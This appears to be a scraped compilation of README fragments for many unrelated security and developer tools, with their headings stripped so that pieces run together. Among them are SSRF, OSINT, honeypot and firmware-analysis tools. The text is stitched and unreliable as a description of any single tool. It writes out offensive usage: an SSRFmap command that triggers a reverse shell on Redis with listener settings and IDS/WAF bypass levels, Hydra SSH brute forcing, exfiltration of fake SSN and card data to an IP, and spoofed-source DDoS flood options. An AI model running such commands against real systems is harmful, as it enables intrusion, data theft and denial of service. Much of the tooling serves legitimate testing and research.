• HTTP sniffer
• LDAP sniffer
• SMTP sniffer
• SIP sniffer
• password sniffer

• Reliable TCP flow rebuilding: it can reorder, reassemble tcp segments and ip fragments using portions of the Linux kernel code
• Logging text mode can be customized
• Extensibility by any executable, such as bash, python, perl scripts, ELF executable, etc.
• Performance measurement it can collect many information on performances: connection time, close time, request time , response time, close time, etc.

• Smart: CDF knows what kind of algorithm it's testing and adapts to the tested functions
• Fast: CDF tests only what needs to be tested and parallelizes its tests as much as possible
• Polyvalent: CDF isn't specific to any language or API, but supports arbitrary executable programs or scripts
• Portable: CDF will run on any Unix or Windows platform, since it is written in Go without any platform-specific dependency

• CryptoPP
• OpenSSL
• BouncyCastle
• PyCrypto
• Cryptography.io

cdf rsaenc /examples/oaep_rsa2048_go /examples/oaep_rsa2048_cryptopp

$ lshw |& ./up

• use PgUp/PgDn and Ctrl-[←]/Ctrl-[→] for basic browsing through the command output;
• in the input box at the top of the screen, start writing any bash pipeline; then press Enter to execute the command you typed, and the Ultimate Plumber will immediately show you the output of the pipeline in the scrollable window below (replacing any earlier contents)
  • For example, you can try writing: grep network -A2 | grep : | cut -d: -f2- | paste - -— on my computer, after pressing Enter, the screen then shows the pipeline and a scrollable preview of its output like below:
    

       | grep network -A2 | grep : | cut -d: -f2- | paste - -
    Wireless interface      Centrino Advanced-N 6235
    Ethernet interface      RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller

  • WARNING: Please be careful when using it! It could be dangerous. In particular, writing "rm" or "dd" into it could be like running around with a chainsaw. But you'd be careful writing "rm" anywhere in Linux anyway, no?
    
• when you are satisfied with the result, you can press Ctrl-X to exit the Ultimate Plumber, and the command you built will be written into up1.sh file in the current working directory (or, if it already existed, up2.sh, etc., until 1000, based on Shlemiel the Painter's algorithm). Alternatively, you can press Ctrl-C to quit without saving.
• If the command you piped into up is long-running (in such case you will see a tilde ~ indicator character in the top-left corner of the screen, meaning that up is still waiting for more input), you may need to press Ctrl-S to temporarily freeze up's input buffer (a freeze will be indicated by a # character in top-left corner), which will inject a fake EOF into the pipeline; otherwise, some commands in the pipeline may not print anything, waiting for full input (especially commands like wc or sort, but grep, perl, etc. may also show incomplete results). To unfreeze back, press Ctrl-Q.

• The pipeline is passed verbatim to a bash -c command, so any bash-isms should work.
• The input buffer of the Ultimate Plumber is currently fixed at 40 MB. If you reach this limit, a + character should get displayed in the top-left corner of the screen. (This is intended to be changed to a dynamically/manually growable buffer in a future version of up.)
• MacOSX support: I don't have a Mac, thus I have no idea if it works on one. You are welcome to try, and also to send PRs. If you're interested in me providing some kind of official-like support for MacOSX, please consider trying to find a way to send me some usable-enough Mac computer. Please note I'm not trying to "take advantage" of you by this, as I'm actually not at all interested in achieving a Mac otherwise. (Also, trying to commit to this kind of support will be an extra burden and obligation on me. Knowing someone out there cares enough to do a fancy physical gesture would really help alleviate this.) If you're serious enough to consider this option, please contact me by email (mailto:czapkofan@gmail.com) or keybase (https://keybase.io/akavel), so that we could try to research possible ways to achieve this. Thanks for understanding!
• Prior art: I was surprised no one seemed to write a similar tool before, that I could find. It should have been possible to write this since the dawn of Unix already, or earlier! And indeed, after I announced up, I got enough publicity that my attention was directed to one such earlier project already: Pipecut. Looks interesting! You may like to check it too! (Thanks @TronDD.)
• Other influences: I don't remember the fact too well already, but I'm rather sure that this must have been inspired in big part by The Bret Victor's Talk(s).

brew tap jesseduffield/lazygit
brew install lazygit

sudo add-apt-repository ppa:lazygit-team/release
sudo apt-get update
sudo apt-get install lazygit

sudo add-apt-repository ppa:lazygit-team/daily
sudo apt-get update
sudo apt-get install lazygit

sudo xbps-install -S lazygit

• Stable: https://aur.archlinux.org/packages/lazygit/
• Development: https://aur.archlinux.org/packages/lazygit-git/

go get github.com/jesseduffield/lazygit

• Basic video tutorial here.
• List of keybindings here.

• Adding files easily
• Resolving merge conflicts
• Easily check out recent branches
• Scroll through logs/diffs of branches/commits/stash
• Quick pushing/pulling
• Squash down and rename commits

• Easy Installation (homebrew, release binaries)
• Configurable Keybindings
• Configurable Color Themes
• Spawning Subprocesses
• Maintainability
• Performance
• i18n

$ git clone https://github.com/rfunix/Pompem.git

• Requests 2.9.1+

$ pip3.5 install -r requirements.txt

$ python3.5 pompem.py -h

Options:
  -h, --help                      show this help message and exit
  -s, --search <keyword,keyword,keyword>  text for search
  --txt                           Write txt File
  --html                          Write html File

$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start an handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

• All you need to know about SSRF and how may we write tools to do auto-detect - Auxy
• How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai
• Blog on Gopherus Tool -SpyD3r
• Gopherus - Github
• SSRF testing - cujanovic

1. Information gathering [nmap-unicornscan]
   
   • TCP scan
   • UDP scan
2. Vulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]
   It tests several services:
   
   • smb
   • ssh
   • snmp
   • smtp
   • ftp
   • tftp
   • ms-sql
   • mysql
   • rdp
   • http
   • https
   • and more...
   It finds the CVEs and then searchs them on exploit-db or Metasploit db.
   
3. Exploitation [hydra]
   
   • brute force ssh

• Interactive mode:
  kaboom [ENTER] ...and the script does the rest

• NON-interactive mode:
  kaboom <results_path> <nic> <target_ip> [-s or --shutdown]

Ponce                            Ponce         Ctrl+Shift+Z 0  WIN

• Exploit development: Ponce can help you create an exploit in a far more efficient manner as the exploit developer may easily see what parts of memory and which registers you control, as well as possible addresses which can be leveraged as ROP gadgets.
• Malware Analysis: Another use of Ponce is related to malware code. Analyzing the commands a particular family of malware supports is easily determined by symbolizing a simple known command and negating all the conditions where the command is being checked.
• Protocol Reversing: One of the most interesting Ponce uses is the possibility of recognizing required magic numbers, headers or even entire protocols for controlled user input. For instance, Ponce can help you to list all the accepted arguments for a given command line binary or extract the file format required for a specific file parser.
• CTF: Ponce speeds up the process of reverse engineer binaries during CTFs. As Ponce is totally integrated into IDA you don't need to worry about setup timing. It's ready to be used!

• Tainting engine: This engine is used to determine at every step of the binary's execution which parts of memory and registers are controllable by the user input.
• Symbolic engine: This engine maintains a symbolic state of registers and part of memory at each step in a binary's execution path.

• Passing simple aaaaa as argument.
• We first select the symbolic engine.
• We convert to symbolic the memory pointed by argv[1] (aaaaa)
• Identify the symbolic condition that make us win and solve it.
• Test the solution.

• We select the symbolic engine and set the option to symbolize argv.
• We identify the condition that needs to be satisfied to win the crackMe.
• We negate an inject the solution everytime a byte of our input is checked against the key.
• Finally we get the key elite that has been injected in memory and therefore reach the Win code.

• Passing a file as argument to cmake to have him parsing it.
• We select we want to use the tainting engine
• We taint the buffer that ```fread()```` reads from the file.
• We resume the execution under the debugger control to see where the taint input is moved to.
• Ponce will rename the tainted functions. These are the functions that somehow the user has influence on, not the simply executed functions.

• Passing a file as argument.
• We select we want to use the symbolic engine.
• We taint the buffer that ```fread()```` reads from the file.
• We create a snapshot in the function that parses the buffer read from the file.
• When a condition is evaluated we negate it, inject the solution in memory and restore the snapshot with it.
• The solution will be "valid" so we will satisfy the existent conditions.

• Access the configuration and taint/symbolic windows: Edit > Ponce > Show Config (Ctl+Shift+P and Ctl+Alt+T)

• Enable/Disable Ponce tracing (Ctl+Shift+E)

• Symbolize/taint a register (Ctl+Shift+R)

• Symbolize/taint memory. Can be done from the IDA View or the Hex View (Ctl+Shift+M)

• Solve formula (Ctl+Shift+S)

• Negate & Inject (Ctl+Shift+N)

• Negate, Inject & Restore Snaphot (Ctl+Shift+I)

• Create Execution Snapshot (Ctl+Shift+C)

• Restore Execution Snapshot (Ctl+Shift+S)

• Delete Execution Snapshot (Ctl+Shift+D)

• Execute Native (Ctl+Shift+F9)

• Clone the project with submodules: git clone --recursive https://github.com/illera88/PonceProject.git
• Open Build\PonceBuild\Ponce.sln: The project configuration is ready to use the includes and libraries shipped with the project that reside in external-libs\.
• The VS project has a Post-Build Event that will move the created binary plugin to the IDA plugin folder for you. copy /Y $(TargetPath) "C:\Program Files (x86)\IDA 6.9\plugins". NOTE: use your IDA installation path.

• x86ReleaseStatic: will create the 32 bits version statically linking every third party library into a whole large plugin file.
• x86ReleaseZ3dyn: will create the 32 bits version statically linking every third party library but z3.lib.
• x64ReleaseStatic: will create the 64 bits version statically linking every third party library into a whole large plugin file.
• x64ReleaseZ3dyn: will create the 64 bits version statically linking every third party library but z3.lib.

• Symbolic memory load/write: When the index used to read a memory value is symbolic like in x = aray[symbolic_index] some problems arise that could lead on the loose of track of the tainted/symbolized user controled input.
• Triton doesn't work very well with floating point instructions.

• Alberto Garcia Illera (@algillera) alberto.garcia@salesforce.com
• Francisco Oca (@francisco_oca) foca@salesforce.com

• Microsoft Windows 7
• Microsoft Windows 10
• Microsoft Windows Server 2012 / 2012 R2
• Microsoft Windows Server 2016

• For this script to work, the Windows Remote Management services need to be allowed in the Windows Firewall (5985);
• If the target system's network profile is set to Public the following command needs to be executed to allow Windows Remote Management services being used on the target system: Enable-PSRemoting -SkipNetworkProfilecheck -Force
• This script only works when one has the credentials of a local Administrator on the target system. Without these credentials you will not be able to start a remote session with the target machine, or be able to activate DCOM applications.

.\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System] -Domain [Domain name]

.\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System]

• Currently the script does try to release any instantiated / activated DCOM applications but some activations start new processes (such as Internet Explorer), the process could be stopped but this would mean that if a user on the target system is using that particular application, this process will stop for them as well;
• Another thing, which probably has to do with bad my coding skills, is that the script might introduce considerable load on the target system if the target system does not have a lot of resources. Be considerate when using this in a production environment or on servers;
• The script might take some time to execute completely, this depends on the amount of DCOM applications and the size of the vulnerable subset file.

• Secure Shell (SSH) key files
• Secure Socket Layer (SSL) key files
• Internet Protocol (IP) addresses
• Uniform Resource Locator (URL)
• email addresses
• shell scripts
• web server binaries
• configuration files
• database files
• specific binaries files (i.e. Dropbear, BusyBox, etc.)
• shared object library files
• web application scripting variables, and
• Android application package (APK) file permissions.

• Python-Magic - See documentation for instructions for Python3-magic installation
• vFeed Database - For non-commercial use, register and download the Community Edition database

$ trommel.py --help

$ trommel.py -p /directory -o output_file

$ trommel.py -p /directory -o output_file -b

• The intended use of TROMMEL is to assist researchers during firmware analysis.
• TROMMEL has been tested using Python3 on Kali Linux x86_64.
• TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices.

• vFeed
• Firmwalker
• Lua Code: Security Overview and Practical Approaches to Static Analysis by Andrei Costin

• Kyle O'Meara - komeara AT cert DOT org

1. Install the dependencies

• Download and install Python 3.4.
• Install Visual Studio 2015 (you'll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS%.
• Get Cython: pip install Cython >=0.23.4.

2. Install fibratus via the pip package manager:

pip install fibratus

1. Install pyftpdlib
2. Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

• https://www.christophertruncer.com/egress-assess-testing-egress-data-detection-capabilities/
• https://www.christophertruncer.com/egress-assess-action-via-powershell/

./Egress-Assess.py --server ftp --username testuser --password pass123

./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn

./Egress-Assess.py --server https

./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc

• install and deploy
• extend with plugins and loggers
• run with custom configurations

• Twitter: https://twitter.com/HoneyPyLog
• Web service endpoint and displayed via the HoneyDB web site: https://riskdiscovery.com/honeydb

• Plugins:
  
  • ElasticSearch
  • SIP
  • etc.
• Loggers:
  
  • HoneyDB
  • Twitter
  • etc.

• source port
• ttl: 3..255
• tcp options: out of seven different real life options with different lengths and probabilities
• user agent for http header: out of a by file given list (an example file is included, see below)

:~$ ./configure
:~$ make
:~$ make install

:~$ bonesi [OPTION...] <dst_ip:port>

 Options:

  -i, --ips=FILENAME               filename with ip list
  -p, --protocol=PROTO             udp (default), icmp or tcp
  -r, --send_rate=NUM              packets per second, 0 = infinite (default)
  -s, --payload_size=SIZE          size of the paylod, (default: 32)
  -o, --stats_file=FILENAME        filename for the statistics, (default: 'stats')
  -c, --max_packets=NUM            maximum number of packets (requests at tcp/http), 0 = infinite (default)
      --integer                    IPs are integers in host byte order instead of in dotted notation
  -t, --max_bots=NUM               determine max_bots in the 24bit prefix randomly (1-256)
  -u, --url=URL                    the url (default: '/') (only for tcp/http)
  -l, --url_list=FILENAME          filename with url list (only for tcp/http)
  -b, --useragent_list=FILENAME    filename with useragent list (only for tcp/http)
  -d, --device=DEVICE              network listening device (only for tcp/http, e.g. eth1)
  -m, --mtu=NUM                    set MTU, (default 1500). Currently only when using TCP.
  -f, --frag=NUM                   set fragmentation mode (0=IP, 1=TCP, default: 0). Currently only when using TCP.
  -v, --verbose                    print additional debug messages
  -h, --help                       print help message and exit

• 50,000 ip addresses generated randomly to use with --ips option

• several browser identifications to use with --useragentlist option

• several urls to use with --urllist option

What does Maltego do?

• People.
  • Names.
  • Email addresses.
  • Aliases.
• Groups of people (social networks).
• Companies.
• Organizations.
• Web sites.
• Internet infrastructure such as:
  • Domains.
  • DNS names.
  • Netblocks.
  • IP addresses.
• Affiliations.
• Documents and files.

Maltego CE Features:

• The ability to perform link analysis on up to 10 000 entities on a single graph.
• The capability to return up to 12 entities per transform that is run.
• Includes collection nodes which automatically group entities together with common features allowing you to see passed the noise and find the key relationships you are looking for.
• Includes the ability to share graphs in real-time with multiple analysts in a single session.
• Graph export options include:
  • GraphML.
  • Entity lists.
• Graph import options include:
• Tablular formats - csv, xlx and xlsx.
• Copy and paste.

Technical Details:

• Maltego CE is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
• Hardware Requirements:
  • A Maltego CE client requires at least 2GB of RAM, but the more the merrier as Maltego loves memory.
  • Any modern multi-core processor will have more than enough processing power.
  • 4GB of disk space should be more than enough.
  • Using a mouse makes navigating Maltego graphs much easier and is definitely recommended.
  
  
• Network Requirements:
• A Maltego CE client requires Internet Access to operate fully.
• The client will need to make outgoing connections on the following ports: 80, 443, 8081. Additionally port 5222 is needed to join shared graphs on Paterva's public Comms server.
• Please note that a Maltego client may need to make connections on additional ports if the client is using transform from 3rd party transform vendors from the Transform Hub.

File Name     :     README
Author        :     @sk_security
Version       :     0.0.1
Website       :     osint-spy.com

• Perform scan on IP Address / domain / email address / BTC(bitcoin) address / device
• Find out latest bitcoin block information
• List out all the ciphers supported by particular website and server
• Check whether a particular website is vulnerable to heartbleed or not ?
• Dump all the contacts and messages from skype database
• Analyze malware or malicous file remotely

   @@@@@@@@@     @@@@@@@@@  |  @@      @  88888|88888       @@@@@@@@@  8@@@@@@@@  8           @
  88888888888    |          |  @ @     @       |            |          8       @    8        @
  @@@@@@@@@@@    |          |  @  @    @       |            |          8       @      8     @
  88888888888    |@@@@@@@@  |  @   @   @       |      ----  |@@@@@@@@  8@@@@@@@@        8  @
  @@@@@@@@@@@            |  |  @    @  @       |                    |  8                  @
  @@@@@@@@@@@            |  |  @     @ @       |                    |  8                 @
   888888888     @@@@@@@@|  |  @      @@       |            @@@@@@@@|  8                @


                                     Search using OSINT
                                  Website: www.osint-spy.com

    Usage: osint-spy.py [options]
    Options:
    -h,            --help                    show this help message and exit.
    --btc_block                              Find latest Bitcoin blockchain info.
    --btc_date                               Find Bitcoin blockchain information from given date.
    --btc_address                            Find out balance and transaction information of given bitcoin address.
    --ssl_cipher                             List out all the ciphers used by given server.
    --ssl_bleed                              Check whether server is vulnerable to heart bleed flaw or not.
    --domain                                 Get bunch of detail of given website or organization.
    --email                                  Gather information of a given email address.
    --device                                 Find out devices which are connected to internet.
    --ip                                     Enumerate information from given IP Addresss.
    --skype_db                               Give the location of skype database in order to fetch all the information from that including chats and contacts.
    --malware                                Find out whether a given file is infected by malware or not.
    --carrier                                Give path of carrier file behind which you want to add text.
    --setgo_text                             Enter text to hide behind carrier file.
    --stego_find                             Give a stego file and it will try to find hidden text.

• Python 2.7
• Use install_linux.py (for installing all dependencies and libraries on linux)
• Use install_windows.py (for installing all dependencies and libraries on windows)

1. Sharad Kumar - @sk_security <twitter handler>

Installing and using OSINT-SPY is very easy.Installation process is very simple and is of 4 steps.
1.Downloading or cloning OSINT-SPY github repository.
2.Downloading and installing all dependencies.
3.Generating API Keys
4.Adding API Keys in config file

Let's Begin !!

Step 1 - Download OSINT-PSY on your system.

In order to install OSINT-SPY simply clone the github repository.Below is the command which you can use in order to clone OSINT-SPY repository.
git clone https://github.com/SharadKumar97/OSINT-SPY.git
Step 2 - Downloading and Installing dependencies.

Once you clone OSINT-SPY, you will find one directory name as OSINT-SPY. Just go that directory and install dependencies. If you are using OSINT-SPY on windows then run install_linux.py file and if you are using linux then run install_linux.py
python install_linux.py

OR
python install_windows.py

We need some API Keys before using this tool.Following are the API's which we are using in this tool for a time being.
1.Clearbit API
2.Shodan API
3.Fullcontact API
4.Virus_Total API
5.EmailHunter API

Clearbit API

    Register yourself at Clearbitand activate your account.
    Once you login, you will find one section of API. Go there and copy your secret API Key and paste inside config.py file.
    Config.py file can be find in modules directory of OSINT-SPY.



Shodan API

    Register yourself at Shodan and activate your account.
    Once you activated your account then login to Shodan.
    Once you login, you will find an API key in overview tab.
    Copy that key and paste inside config.py file.



FullContact API

    Register yourself at Full Contact. You can sign up by using your email or you can Sign Up with Google.
    Once you login, you will find your API Key on front of your dashboard.
    Just copy that key and paste it inside config.py file.



VirusTotal API

    Register yourself at VirusTotal.
    Once you login, you will find My Api Key section in your profile menu. Just go there and copy your public API Key and paste in config.py file.



EmailHunter API

    Register yourself at Email Hunter .
    Once you login, go to API tab and click on EYE icon to view your API Key.
    Copy your API Key in config.py file.

OSINT-SPY is very handy tool and easy to use.All you have to do is just have to pass values to parameter.In order to start OSINT-SPY just write -- 
python osint-spy.com

--btc_block

    --btc_block parameter gives you the information of latest bitcoin block chain.

Usage:
python osint-spy.py   --btc_block

--btc_date

    --btc_date parameter will give you an information of bitcoin block chain from given date.

Usage:
python osint-spy.py   --btc_date 20170620

--btc_address

    --btc_address will give you an information about particular bitcoin owner.

python osint-spy.py  --btc_address 1DST3gm6JthxhuoNKFqXrdpzPFfz1WgHpW

--ssl_cipher

    --ssl_cipher will show you all the ciphers supported by given website.

python osint-spy.py  --ssl_cipher google.com

--ssl_bleed

    --ssl_bleed will find out whether given website is vulnerable to heartbleed or not ? .

python osint-spy.py  --ssl_bleed google.com

--domain

    --domain will give you in depth-information about particular domain including whois,dns,ciphers,location and so more.

python osint-spy.py  --domain google.com

--email

    --email will gather information about given email address from various public sources.

python osint-spy.py  --email david@toorcon.org

--device

    --device will search for a given device from shodan and will list out all the available devices on public IP.

python osint-spy.py  --device webcam

--ip

    --ip will gather all the information of given IP Address from public sources.

python osint-spy.py  --ip 127.0.0.1

--skype_db

    --skype_db will find out all the contacts and message history from given skype database.This can be useful for forensics investigator.In Windows,Skype database can be found in AppData\Roaming\Skype\(Your username)\main.db and in Mac OSX , database can be found in /Users/(Your mac user anme)/Library/Support/Skype/(your skyoe username)/main.db

python osint-spy.py   --skype_db main.db

--malware

    --malware will send a given piece of file to virustotal and will give you a result whether given file is malware or not? .

python osint-spy.py  --malware abc.exe

--carrier and --stego_text

    --carrier and --stego_text are used to hide text behind any image.
    --carrier will specify the image behind which you want to hide the text.
    --stego_text will specify the text you want to add.

python osint-spy.py  --carrier image.jpg    --stego_text This_is_secre_text

--stego_find

    --stego_find will find out hidden text behind any image.

python osint-spy.py  --stego_find hidden.jpg

• Runs on ARM, x64 and x86 devices, including x86 emulators (LDPlayer, BlueStacks, Droid4X, MOMO, KOPlayer, Andy, Memu, Leapdroid, AMIDuOS, Windroye, RemixOS, PhoenixOS, AVD, Genymotion, Nox etc.)
• Supports Android 2.3.3+ (Gingerbread) through Lollipop (5+), Marshmallow (6+), Nougat (7+), Oreo (8+) and Pie (9+).
• Support work without root via different virtual spaces.
• Support different emulators like PPSSPP, ePSXe, GameBoy etc.
• Game deceleration and acceleration (speedhack) for ARM and x86 devices, including x86 emulators.  Also supports both 32-bit and 64-bit applications on 64-bit devices using speedhack.
• Search feature: encrypted values.
• Search of unknown values when specifying the difference between values.
• Search addresses by mask.
• Explicit and "fuzzy" numeric searches.
• Text (String, Hex, AoB) search.
• Supports: Double, Float, Qword, Dword, XOR, Word, Byte, or Auto data-type searches.
• Lua scripting support.
• Modify all search results at once.
• Filtering of search results (address greater than and less than, value greater than and less than).
• Search in the background feature.
• 'The fill' feature.
• Time jump feature.
• Dump memory.
• Copy memory.
• Customizable UI.
• App locale for over 50 languages.
• And, much, much more.

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

git clone --depth 1 https://github.com/danielmiessler/SecLists.git

git clone git@github.com:danielmiessler/SecLists.git

apt -y install seclists

• Operating System: Mac OSX 10.5.0 or higher / modern Linux
• Ruby: 2.3 or newer
• SQLite: 3.x
• Node.js: 6 or newer
• The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
• brew install selenium-server-standalone (See https://github.com/shvets/selenium)

   $ ./beef